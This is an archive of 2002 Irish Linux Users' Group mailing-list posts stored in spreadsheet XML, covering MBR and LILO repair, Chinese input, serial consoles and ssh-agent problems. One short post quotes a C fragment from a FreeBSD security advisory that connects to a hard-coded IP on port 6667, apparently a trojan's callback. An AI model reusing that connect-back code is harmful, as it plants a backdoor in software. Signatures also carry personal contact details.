 change a lightbulb?  Three.  One calms  |  e-mail: blf@utvinternet.ie
 the warthog, and two fill the bathtub   |  mobile: (+353 or 0)86 854 9268
 with brightly-coloured machine tools.Â»  |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</si>
  <si>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On Wed, Jul 31, 2002 at 02:40:26PM +0100 or so it is rumoured hereabouts, 
Liam Bedford thought:
&gt; On Wed, 31 Jul 2002 14:30:01 +0100
&gt; jac1 claiming to think:
&gt; 
&gt; &gt; hi,
&gt; &gt; i recently had to wipe linux from my pc but forgot to restore the original
&gt; &gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot
&gt; &gt; floppy. formatting the entire disk doesn't do it either.
&gt; &gt; 
&gt; boot from dos and fdisk /mbr?
&gt; boot from an NT CD, choose repair, and make it check the mbr
                             ^^^^^^Nice how NT "repair"s a hard disk by removing other OSs.  Could we call it
that on Linux install disks too?Conor 
-- 
Conor Daly Domestic Sysadmin :-)
---------------------
Faenor.cod.ie
  5:37pm  up 69 days,  2:54,  0 users,  load average: 0.08, 0.02, 0.01
Hobbiton.cod.ie
  5:22pm  up 12 days, 0 min,  1 user,  load average: 0.03, 0.03, 0.00-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">SoloCDM wrote:
&gt; David Neary stated the following:
&gt; &gt; Try the following newsgroups - Beginners: news:comp.lang.learn.c-c++
&gt; 
&gt; I tried news:comp.lang.learn.c-c++ and it wouldn't work.  Is there a
&gt; typo?Yup. It's alt.comp.lang.learn.c-c++ Sorry about that.I've never used the group, so I can't vouch for it's usefulness.
But a few people I respect a lot direct people there for beginner
type stuff.Cheers,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 03:47:40PM +0100 or so it is rumoured hereabouts, 
Niall O Broin thought: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&gt; 
&gt; So, in the event of finger slips we can mount the relevant partition and
&gt; retrieve the banjaxed file. In the case of a disk crash, the plan is that
&gt; we'll put the standby disk in place of the main disk and the workstation
&gt; will be back up ASAP. Then we can deal with replacing the disk without the
&gt; pressure of a broken box on our back.
&gt; 
&gt; However, I'm stumped as to how to install LILO on the backup disk. Let's say
&gt; the master disk is /dev/hda and the backup disk is /dev/hdb. lilo.conf
&gt; currently looks like this:
&gt; 
&gt; boot    = /dev/hda
&gt; change-rules
&gt; reset
&gt; read-only
&gt; menu-scheme = Wg:kw:Wg:Wg
&gt; lba32
&gt; prompt
&gt; timeout = 80
&gt; message = /boot/message
&gt; 
&gt;   image  = /boot/vmlinuz
&gt;   label  = linux
&gt;   root   = /dev/hda3
&gt;   vga    = 791
&gt;   initrd = /boot/initrd
&gt; 
&gt; 
&gt; 
&gt; There are a couple more boot stanzas, but they're not germane. As you can
&gt; see, / is on /dev/hda3 and /boot is on /dev/hda1. So if for instance I had
&gt; booted from a CD and wanted to re-install LILO on this disk I'd do something
&gt; like
&gt; 
&gt; mount /dev/hda3 /mnt
&gt; mount /dev/hda1 /mnt/boot
&gt; lilo -r /mnt
&gt; 
&gt; which is OK because I'm installing lilo on /dev/hda and I want it to boot
&gt; from /dev/hda so it'll plug in all the right numbers.
&gt; 
&gt; However, in the case of the standby disk, I'll have to do something like
&gt; 
&gt; mount /dev/hdb3 /mnt
&gt; mount /dev/hdb1 /mnt/boot
&gt; lilo -r /mnt
&gt; 
&gt; But I'm obviously going to have to do something different here because I
&gt; want to install onto /dev/hdb in such a way that the disk will boot when it
&gt; becomes /dev/hda after a disaster (like the one I had this morning :-( -
&gt; shutting the stable door was on the to-do list, but the bloody horse decided
&gt; to do a bunk early). The machine already has its spare disk - just hadn't
&gt; yet been used :-(
&gt; 
&gt; I thought perhaps I should just do   lilo -b /dev/hdb -r /mnt  but I think
&gt; that -b is analogous to the boot keyword in lilo.conf. Or will this just
&gt; work automagically ?  i.e. boot = /dev/hda tells lilo what numbers to poke
&gt; where, and it figures out where the disk is from the -r ? from the Hard Disk Upgrade Mini HOWTO :8. Prepare LILO to boot the new disk   (Thanks to Rick Masters for helping with this.)   We're  assuming  that LILO is installed on the hard disk's Master Boot
   Record (MBR); this seems to be the most common configuration. You want
   to  install  LILO  on  what's  presently the second hard disk but will
   become the first hard disk.   Edit the file /new-disk/etc/lilo.conf as follows:        disk=/dev/hdb bios=0x80       # Tell LILO to treat the second
                                      # disk as if it were the first
                                      # disk (BIOS ID 0x80).
        boot=/dev/hdb                 # Install LILO on second hard
                                      # disk.
        map=/new-disk/boot/map        # Location of "map file".
        install=/new-disk/boot/boot.b # File to copy to hard disk's
                                      # boot sector.
        prompt                        # Have LILO show "LILO boot:"
                                      # prompt.
        timeout=50                    # Boot default system after 5
                                      # seconds. (Value is in tenths of
                                      # seconds.)
        image=/new-disk/boot/vmlinuz  # Location of Linux kernel. The
                                      # actual name may include a version
                                      # number, for example
                                      # "vmlinuz-2.0.35".
            label=linux               # Label for Linux system.
            root=/dev/hda1            # Location of root partition on
                                      # new hard disk. Modify this as
                                      # appropriate for your system.
                                      # Note that you must use the name
                                      # of the future location, once the
                                      # old disk has been removed.
            read-only                 # Mount partition read-only at
                                      # first, to run fsck.ConorPS.  Um, what does &gt; menu-scheme = Wg:kw:Wg:Wgdo?
-- 
Conor Daly Domestic Sysadmin :-)
---------------------
Faenor.cod.ie
  6:04pm  up 69 days,  3:22,  0 users,  load average: 0.00, 0.00, 0.00
Hobbiton.cod.ie
  5:50pm  up 12 days, 27 min,  1 user,  load average: 0.00, 0.00, 0.00-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">David Neary stated the following:
&gt; 
&gt; SoloCDM wrote:
&gt; 
&gt; &gt; Are there any mailing lists (non-newsgroups) for C++ and C Beginners
&gt; &gt; and Advanced programmers?
&gt; 
&gt; Try the following newsgroups - Beginners: news:comp.lang.learn.c-c++I tried news:comp.lang.learn.c-c++ and it wouldn't work.  Is there a
typo?&gt; More advanced: news:comp.lang.c news:comp.lang.c++
&gt; news:comp.lang.c.moderated
&gt; 
&gt; Also, you should keep a bookmark pointing at the comp.lang.c FAQ at
&gt; http://www.eskimo.com/~scs/C-faq/top.html
&gt; 
&gt; For tutorials, the guy who maintains the clc FAQ (Steve Summit) has
&gt; a tutorial - http://www.eskimo.com/~scs/cclass/notes/top.html Also
&gt; you could have a look at the excercises he poses - all linked from
&gt; http://www.eskimo.com/~scs/cclass/cclass.html
&gt; 
&gt; For C++, I would guess that the comp.lang.c++ FAQ is a good place to
&gt; start - they're likely to have links to suggested reading material.
&gt; 
&gt; If you're going to do any amount of C programming, you should
&gt; think about getting K&amp;R2 (The C programming language, 2nd edition,
&gt; by Kernighan and Ritchie), for C++ the equivalent book is
&gt; Stroustrup. Although the C++ book is a lot bigger :)--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</si>
  <si>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Quoting jac1 (jac1@student.cs.ucc.ie):&gt; i recently had to wipe linux from my pc but forgot to restore the original
&gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot
&gt; floppy. formatting the entire disk doesn't do it either.The easy way is just to install whatever Microsoft or whatever OS you
have in mind:  It should overwrite the MBR.  Indeed, the problem is
usually _preventing_ this from happening, as Microsoft Corporation's
installers seem to forever be overwriting your MBRs when you least wish
it, without asking your permission.-- 
Cheers,               "We're sorry; you have reached an imaginary number.
Rick Moen             Please rotate your 'phone ninety degrees and try again."
rick@linuxmafia.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Wed, 31 Jul 2002 23:11:49 +0800
  | From: Fergal Daly 
  | 
  | 7.3 seems to support Chinese input out of the box, it's got
  | miniChinput and some other stuff no documentation.  [ ... ]
  | google is a bit of a dead too.
  | 
  | Can anyone tell me what I should do? I've no idea, but a relevant/useful source of info could
 be the Â«linux-utf8Â» e-list:     http://www.cl.cam.ac.uk/~mgk25/unicode.html
     http://mail.nl.linux.org/linux-utf8/ whilst the list is nominally about UTF-8/Unicode and Linux,
 it often delves into related areas (such as input methods). my (vague!) understanding of the state-of-play is there are
 multiple ways of keyboarding scripts such as "Chinese", and
 the choice of method is a mixture of personal preference,
 equipment (e.g. your keyboard), and the tool/application
 in question. w.r.t. X11 applications, it seems to boil down to two
 approaches:   one unique to the tool itself (apparently
 `yudit' is famous for this);  or  else using what's called
 an XIM (X Input Method).  WARNING: I am now guessing quite a bit here, based mostly on
           my interpretation of what I've read whilst lurking,
           and watching a few people keyboarding a Japanese
           script years ago!   *** your mileage will vary! *** XIMs generally work as a complex compose frontend.  i.e., you
 build up your character as a series of composes of the root or
 fundamental strokes ("radicals", I think they are called), and
 then "commit" the composite character to the application.
 ( yes, keyboarding these scripts _is_ quite slow, I believe
  a good typist can only do a few characters a minute!
  and I assume using a qwerty keyboard is very painful. ) some XIMs compose "in place", others do it on a special line,
 and some seem to do it in a special window (or the root?).
 also, some(/most?) XIMs apparently support a US-ASCII input
 mode as well --- _not_ a general Latin-alphabet input mode,
 which seems to require another TLA, called KBD, and which
 apparently doesn't work when an XIM is also being used? ---
 implying you have to switch back and forth between US-ASCII
 input mode (what us English-speakers would call "normal"
 keyboarding/typing), and the other input (e.g., Chinese).
 I'm not sure, but I have the impression the switch is often
 a toggle, and something like . many apologies if this is completely wrong or too misleading.cheers!
	-blf-p.s.  b.t.w., you almost certainly want to be using a UTF-8
      locale.  if RH 7.3 is the so-called "limbo" release,
      then you may quite possibility be using one by default.--
Â«How many surrealists does it take to    |  Brian Foster    Dublin, Ireland
 change a lightbulb?  Three.  One calms  |  e-mail: blf@utvinternet.ie
 the warthog, and two fill the bathtub   |  mobile: (+353 or 0)86 854 9268
 with brightly-coloured machine tools.Â»  |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</si>
  <si>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  | Date: Wed, 31 Jul 2002 18:57:50 +0100
  | From: Brian Foster 
  | 
  |   | Date: Wed, 31 Jul 2002 23:11:49 +0800
  |   | From: Fergal Daly 
  |   | 
  |   | 7.3 seems to support Chinese input out of the box, it's got
  |   | miniChinput and some other stuff no documentation.  [ ... ]
  |   | Can anyone tell me what I should do?
  | 
  |  I've no idea, but a relevant/useful source of info could
  |  be the Â«linux-utf8Â» e-list:
  | 
  |      http://www.cl.cam.ac.uk/~mgk25/unicode.html
  |      http://mail.nl.linux.org/linux-utf8/
  |[ ... ]
  |  w.r.t. X11 applications [ one approach is to use ]
  |  what's called an XIM (X Input Method).   [ ... ] sorry for replying to my own post! a google for "xim linux" found a number of hits.
 try (I've haven't finished reading this myself,
 but it seems good):   http://www.suse.de/~mfabian/suse-cjk/ (CJK stands for Chinese Japanese Korean.) the above is probably best read with a browser
 that groks UTF-8.cheers!
	-blf-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</si>
  <si>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useful...I hear this complaint a lot, but I never hear people complaining about being
"forced" to learn to read and write, or to do maths. Maybe people don't mind
as much if it is perceived as a useful skill (which Irish is not usually
perceived as).Anyway, tir gan teanga tir gan anam :)Nick-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Liam Bedford stated the following:
&gt; 
&gt; On Wed, 31 Jul 2002 10:48:16 -0600 SoloCDM claiming to think:
&gt; 
&gt; &gt; "Hunt, Bryan" stated the following:
&gt; 
&gt; &gt;&gt; you need to do a "fdisk /mbr" from a bootable windoze floppy
&gt; &gt;&gt; alternatively boot from linux boot disk and do fdisk, delete all
&gt; &gt;&gt; partitions.
&gt; 
&gt; &gt; I need to ask a question concerning this issue.
&gt; 
&gt; &gt; What if I don't want to get rid of the MBR -- it will destroy the
&gt; &gt; OS on that drive.  How do I remove lilo without the above fdisk
&gt; &gt; procedure?
&gt; 
&gt; fdisk /mbr will restore a dos MBR.. it'll leave the partitions alone.
&gt; 
&gt; linux fdisk and deleting all partitions will actually leave LILO in
&gt; the MBR though.While I am in Linux, the following message is the output when I
execute fdisk /mbr, even though the drive is in read and write mode:Unable to open /mbrThe mbr is on a separate drive -- not related to the Linux drive.--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</si>
  <si>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On Wed, Jul 31, 2002 at 06:57:50PM +0100, Brian Foster wrote:
&gt;  XIMs generally work as a complex compose frontend.  i.e., you
&gt;  build up your character as a series of composes of the root or
&gt;  fundamental strokes ("radicals", I think they are called), and
&gt;  then "commit" the composite character to the application.
&gt;  ( yes, keyboarding these scripts _is_ quite slow, I believe
&gt;   a good typist can only do a few characters a minute!
&gt;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you're prompted with a list of possible matches, with the
most common first in a numbered list, so you hit, say, 2 for
the second in the list, then similarly for 'guo' 3.You can see, that, regarding keystroke counts, it's not that
much different to English.  However, until you get familiar
with the sorting order in the 'possible match' lists, it can
be a little slow.Other input methods are more keystroke-efficient, losing the
phonetic simplicity of Pinyin.  Chinese characters are almost
always pronounced as a first-part-second-part, so zhong is
'zh'-'ong'.  One input method assigns single letters to
the possible first and second parts, so 'i' might represent
'zh' as a first part and 'ong' as a second part, so you'd
enter zhong as 'ii' and a digit to choose from the possible
matches.I think the Microsoft Global IME has a 'stroke' mode where
you can build up a character stroke by stroke, but you'd only
use that when you know the character you want but you don't
know how to pronounce it.&gt; 
&gt;  some XIMs compose "in place", others do it on a special line,
&gt;  and some seem to do it in a special window (or the root?).
&gt;  also, some(/most?) XIMs apparently support a US-ASCII input
&gt;  mode as well --- _not_ a general Latin-alphabet input mode,
&gt;  which seems to require another TLA, called KBD, and which
&gt;  apparently doesn't work when an XIM is also being used? ---
&gt;  implying you have to switch back and forth between US-ASCII
&gt;  input mode (what us English-speakers would call "normal"
&gt;  keyboarding/typing), and the other input (e.g., Chinese).
&gt;  I'm not sure, but I have the impression the switch is often
&gt;  a toggle, and something like .Probably most often Ctrl-Space.  That's what the Microsoft Global
Input Method Editor uses and what xcin uses IIRC.Regarding the original poster's question - here's what works for me
on Red Hat 7.2o  Make sure the xcin and ttfonts-zh_CN RPMs are installed.  (The
   fonts might not be essential, I think XFree comes with usuable
   Chinese fonts in the XFree86-fonts RPMso  Select Chinese (Simplified) as the language in GDM when logging
   in.Everything should 'just work'.  If you've got the default clock in
your GNOME panel, you should now see it in Chinese.  A lot of the
menus will also be in Chinese, but you should be able to find your
way around.Use Ctrl-Space to toggle between Chinese and English input.  When 
in Chinese mode Shift-Space toggles between something that I don't
understand, but it blocks exiting to English.  So if you can't use
Ctrl-Space to get back to English, try hitting Shift-Space, Ctrl-Space.Fire up a GNOME terminal.  In Chinese mode, type zhong 1 guo 1 and 
you'll see the Chinese for China.Getting this to work while selecting English at the GDM screen is left
as an exercise for the reader.  Looking at /etc/X11/xinit/xinitrc.d/xinput
and /usr/share/doc/xcin should give enough info.Later,
Kenn-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Well you know what I mean.I noticed 2 connections from my
(freshly installed RH7.3) machine to
port 80 of the following addresses.216.145.20.5
216.254.17.87Both resolve to cytocin.hubbe.NET
using CCOM.NET &amp; speakeasy.NET DNS
servers respectively.Both connections lasted about 20
seconds and were about 2 minutes apart.
Any ideas?I didn't see what processes they came from,
but I'm keeping a close eye now.Thanks,
PÃ¡draig.p.s. I'm can't subscribe to the list
at the moment for some reason? so please
reply directly.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Some local Irish wildlifehttp://www.iol.ie/~padraiga/pics/wild1.jpg
http://www.iol.ie/~padraiga/pics/wild2.jpgwas I bored or what?PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> I've found a decrepit raq3 that I'm going to resurrect, as soon as I work
out what's up with the console. I'm using 115200 8n1 with minicom, and I'm getting wierd stuff like:S+#_+Ã…Â± INET __+_: 
S+#_+Ã…Â± Ã…Â°_Â°_ MÃ„+Ã…+Ã…Â± _+Ã„+ Â°+_&lt;_++_.
S+#_+Ã…Â± #+__+ S+#_+Ã…Â± #+Ã… + __+_: 
IÃ…+#+ _+Â°#+_ Â°Ã„_ +#Ã… _+ -- NÃ„+ _+#_+Ã…Â± SSL/+__/_Ã…/++Ã„
S++Ã…Â± +Ã„ PÃ„_+Â±_SQL: FATAL: S+_#+S_+_PÃ„_+: Ã…() Â°#+: A___ #+_#&lt; Ã… +_
        I_ #Ã…Ã„+_ Ã„Ã„_++#_+_ #+_#&lt; _+Ã…Ã…Ã…Â± Ã„Ã… +#+ Ã„Ã„_+?
        IÂ° Ã…Ã„+, _+Ã„+ _Ã„++ Ã…Ã„ (/++Ã„/._.PGSQL.5583) #Ã… _+_&lt;.
/+__/Ã…/Ã„Ã„_++#_+_: #Ã…Ã…Ã„+ _#+ UNIX _+_#+ Ã„Ã„_+
 [616]
S+#_+Ã…Â± ++Ã„ S++Ã…Â± +Ã„ W S_+:  So it looks like some sort of setting mismatch. Various places on the web
say that cobalts are setup with 115200 8n1 serial ports, but someone could
have changed it on this particular box. Anyone care to guess what's up ?John
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002, John P. Looney wrote:&gt;  I've found a decrepit raq3 that I'm going to resurrect, as soon as I work
&gt; out what's up with the console.
&gt; 
&gt;  I'm using 115200 8n1 with minicom, and I'm getting wierd stuff like:Should it be 38K4 - a fairly common baudrate for serial port
connections? Though if you are getting this much, the baudrate
may be right. It looks like high ASCII so it may also be worth
playing with the tty type (ANSI/VT etc).&gt;  So it looks like some sort of setting mismatch. Various places on the web
&gt; say that cobalts are setup with 115200 8n1 serial ports, but someone could
&gt; have changed it on this particular box.Regards...jmcc
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-securitysa.sin_family=AF_INET;
sa.sin_port=htons(6667);
sa.sin_addr.s_addr=inet_addr("203.62.158.32");David.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; quickie for shell scripters:
&gt; How do I find out the time a file was created at?
 There is no canonical test, and the information is not necessarily
 available. If you check out how struct stat is defined on your system,
 you'll find that only     time_t   st_atime;    /* Time of last access */
     time_t   st_mtime;    /* Time of last data modification */
     time_t   st_ctime;    /* Time of last file status change */
                           /* Times measured in seconds since */
                           /* 00:00:00 UTC, Jan. 1, 1970 */ are available. File status change = i-node status change, it includes
 creation, mode change, ownership change etc., so this is what you want
 only if the file status wasn't changed since creation. This information is also shown by ls -lc, but parsing ls' output requires
 a bit of effort. I'd rather recommend to write a short C program to access
 the file status directly, and output the ctime directly (seconds since
 the epoch, i.e. perfect for numerical comparison). (Another way is to use GNU find -printf with a custom format:
  ...
            %c   File's last  status  change  time  in  the  format
               returned by the C `ctime' function.
 ...)
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002 17:15:27 +0100 
"John P. Looney"   wrote:|  I've found a decrepit raq3 that I'm going to resurrect, as soon as I work
| out what's up with the console.|  I'm using 115200 8n1 with minicom, and I'm getting wierd stuff like:| S+#_+Ã…Â± INET __+_: 
| S+#_+Ã…Â± Ã…Â°_Â°_ MÃ„+Ã…+Ã…Â± _+Ã„+ Â°+_&lt;_++_.
| S+#_+Ã…Â± #+__+ S+#_+Ã…Â± #+Ã… + __+_: 
| IÃ…+#+ _+Â°#+_ Â°Ã„_ +#Ã… _+ -- NÃ„+ _+#_+Ã…Â± SSL|  So it looks like some sort of setting mismatch. Various places on the web
| say that cobalts are setup with 115200 8n1 serial ports, but someone could
| have changed it on this particular box.|  Anyone care to guess what's up ?One possible is that it's toggling the VTx00 alt character set. If 
that's the case, feeding ^O to the tty somehow (i.e. cat to the device) 
should flip it back.
	Paul
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 01, 2002 at 04:03:07PM +0100, Padraig Brady mentioned:
&gt; Some local Irish wildlife
&gt; 
&gt; http://www.iol.ie/~padraiga/pics/wild1.jpg
&gt; http://www.iol.ie/~padraiga/pics/wild2.jpg
&gt; 
&gt; was I bored or what? Most likely. Hey...is that one of my nice wai-yip stuffed ones ?Kate
 -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 01, 2002 at 05:41:03PM +0100, Paul Mc Auley mentioned:
&gt; On Thu, 1 Aug 2002 17:15:27 +0100 
&gt; | S+#_+Ã…Â± INET __+_: 
&gt; | S+#_+Ã…Â± Ã…Â°_Â°_ MÃ„+Ã…+Ã…Â± _+Ã„+ Â°+_&lt;_++_.
&gt; | S+#_+Ã…Â± #+__+ S+#_+Ã…Â± #+Ã… + __+_: 
&gt; | IÃ…+#+ _+Â°#+_ Â°Ã„_ +#Ã… _+ -- NÃ„+ _+#_+Ã…Â± SSL
&gt; 
&gt; |  So it looks like some sort of setting mismatch. Various places on the web
&gt; | say that cobalts are setup with 115200 8n1 serial ports, but someone could
&gt; | have changed it on this particular box.
&gt; 
&gt; |  Anyone care to guess what's up ?
&gt; 
&gt; One possible is that it's toggling the VTx00 alt character set. If 
&gt; that's the case, feeding ^O to the tty somehow (i.e. cat to the device) 
&gt; should flip it back. Ah right. Seems OK now. I assume that could have happened if the terminal
was in 9600 mode at first, getting wierd characters ?Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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agent).In case there was something else in Alfred' environment, I copied .??* from
alfred's home directory to alfio's, remembering to change ownership
afterwards. Still alfio is as free as a bird.We use only SSH2 with DSA keys. An extract from a ssh -v for alfio is belowdebug1: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publickeyand before starting this ssh attempt, ssh-add -l for alfio said:1024 07:4c:7c:90:0d:28:41:3a:95:c2:81:3d:ba:c4:3d:03 /home/alfio/.ssh/id_dsa (DSA)whereas with alfred the same segment of the debug log wentdebug1: got SSH2_MSG_SERVICE_ACCEPT
debug1: authentications that can continue: publickey,password
debug1: next auth method to try is publickey
debug1: userauth_pubkey_agent: testing agent key /nfshome/alfred/.ssh/id_dsa
debug1: authentications that can continue: publickey,passwordand before starting this ssh attempt, ssh-add -l for alfred said:1024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Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I just heard from Kevin Patrick Scannell, author of the Irish-language
ispell dictionary ("ispell-gaeilge") discussed a month or two ago.
He's revised it, and moreover has added a version for the much-better
aspell package ("aspell-gaeilge").  The latter is particularly good news
for users of OpenOffice.org.Details for us anglophones:  http://borel.slu.edu/ispell/index-en.html
And in Irish:  http://borel.slu.edu/ispell/-- 
Cheers,      "Transported to a surreal landscape, a young girl kills the first
Rick Moen     woman she meets, and then teams up with three complete strangers
rick@linuxmafia.com       to kill again."  -- Rick Polito's That TV Guy column,
              describing the movie _The Wizard of Oz_-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">At 17:34 31/07/02 +0100, Liam Bedford wrote:
&gt;fdisk /mbr will restore a dos MBR.. it'll leave the partitions alone.
Will clear the Partition table entries in the MBR if it does not end with 
valid Boot signature.Regards Ger-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I will be out of the office starting  02/08/2002 and will not return until
06/08/2002.I am out of the office until Tuesday 6th August.   I will reply to messages
on my return.Thank you.
DermotImportant Email InformationThe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e-mail.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I swear to god you have to be so carefull with dell machines and linux. My
laptop is the only dell 
that I've had so far that you could do a quick clean install of linux on.
Every machine recently seems 
to have some cheapo piece of hardware (eth card, modem, sound, graphics )
that is incompatable/unsupported. 
I don't know how long I've spent banging my head off the wall with some crap
dell machine that 
the secretary/store manager/windoze admin of whatever company I've been in
has ordered.
Ok everything is budget basement these days but they're getting the
components cheaper as well. 
If you do buy from dell be damned carefull what you order cause the default
config cheapo machines 
are allways a pain in the hole. 
--B-----Original Message-----
From: deccy@csn.ul.ie [mailto:deccy@csn.ul.ie]
Sent: 01 August 2002 23:19
To: ilug@linux.ie
Subject: [ILUG] Dell GX260 V Redhat 7.3
Hi,
We just got some new Dell GX260 machines here are work and I'm supposed to
be putting Linux on them. I tried installing RedHat 7.3. It just didn't want
to know about the graphics card. I's an onboard Intel DVMT chip. No
dedicated memory, it takes it from the onboard RAM.I was wondering if anybody had gotton these machines and had any luck
getting this graphics card working?When this graphics card didn't work, I installed a PCI Diamond Stealth 64
VRAM card. Xconfigurator auto-detected this and my 21" SUN monitor no
problem but whenever it tries to test the configuration it fails and the
screen is left with a blue background and all of the text is blue.
Does anybody have any idea what the problem is or how to fix it?
Cheers,
deccy.-- 
---------------------------------------
Declan Houlihan
deccy@csn.ul.ie
http://deccy.csn.ul.ie/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</si>
  <si>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there.I also found somewhere (not through personal experience though) that
2.4.19-pre10ac2 includes drivers for the chipset ?Steve
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Niall,Some thoughts...o Run the ssh client with verbosity 3 (ssh -v -v -v)
o Run an sshd with debugging level three (sshd -d -d -d)
o ~alfio doesn't seem to be nfs-mounted like ~alfred(The following aren't really applicable, but...
    o Has alfred been logged in for ages? Has the tmpsweeper swept
      through /tmp removing alfred's ssh-agent directory in its wake?
    o Is /tmp a+rwxt? Does /dev/null exist?
    o Has alfred been messing with his TMPDIR envar?
    o What does lsof on his ssh-agent say? What about on alfio's?
    o What are the permissions on ~alfred and ~alfred/.ssh?
    o Does alfred's uid conflict with somebody else's?
    o Does alfred's $SSH_AGENT_PID correspond to his agent? alfio's?
)Wesley.
On Thu, Aug 01, 2002 at 03:51:12PM +0100, Niall O Broin wrote:
&gt; I have a strange problem with one user in a small network using ssh.
&gt; Everyone in the network uses ssh and they run an ssh-agent on login. This
&gt; works fine for conveniently wandering around the network and to some of our
&gt; external boxes - or did, until today. Suddenly, when one user (alfred) tries
&gt; to ssh anywhere he's asked for a password. He says He changed nothing (don't
&gt; they all) but I do actually believe him. I used ssh-keygen to make new keys
&gt; but that didn't help. 
&gt; 
&gt; I created a new user alfio into whose home directory I copied alfred's .ssh
&gt; directory - alfio can wander around free as a bird without being asked for a
&gt; password ever (except of course for the passphrase to load the identiy into
&gt; the agent).
&gt; 
&gt; In case there was something else in Alfred' environment, I copied .??* from
&gt; alfred's home directory to alfio's, remembering to change ownership
&gt; afterwards. Still alfio is as free as a bird.
&gt; 
&gt; We use only SSH2 with DSA keys. An extract from a ssh -v for alfio is below
&gt; 
&gt; debug1: got SSH2_MSG_SERVICE_ACCEPT
&gt; debug1: authentications that can continue: publickey,password
&gt; debug1: next auth method to try is publickey
&gt; debug1: userauth_pubkey_agent: testing agent key /home/alfio/.ssh/id_dsa
&gt; debug1: input_userauth_pk_ok: pkalg ssh-dss blen 434 lastkey 0x80916f0 hint -1
&gt; debug1: ssh-userauth2 successful: method publickey
&gt; 
&gt; and before starting this ssh attempt, ssh-add -l for alfio said:
&gt; 
&gt; 1024 07:4c:7c:90:0d:28:41:3a:95:c2:81:3d:ba:c4:3d:03 /home/alfio/.ssh/id_dsa (DSA)
&gt; 
&gt; whereas with alfred the same segment of the debug log went
&gt; 
&gt; debug1: got SSH2_MSG_SERVICE_ACCEPT
&gt; debug1: authentications that can continue: publickey,password
&gt; debug1: next auth method to try is publickey
&gt; debug1: userauth_pubkey_agent: testing agent key /nfshome/alfred/.ssh/id_dsa
&gt; debug1: authentications that can continue: publickey,password
&gt; 
&gt; and before starting this ssh attempt, ssh-add -l for alfred said:
&gt; 
&gt; 1024 07:4c:7c:90:0d:28:41:3a:95:c2:81:3d:ba:c4:3d:03 /home/alfred/.ssh/id_dsa (DSA)
&gt; 
&gt; 
&gt; This problem is definitely related to alfred as a user - it happens when he
&gt; logs in on differing workstations (all NFS mounting the same home
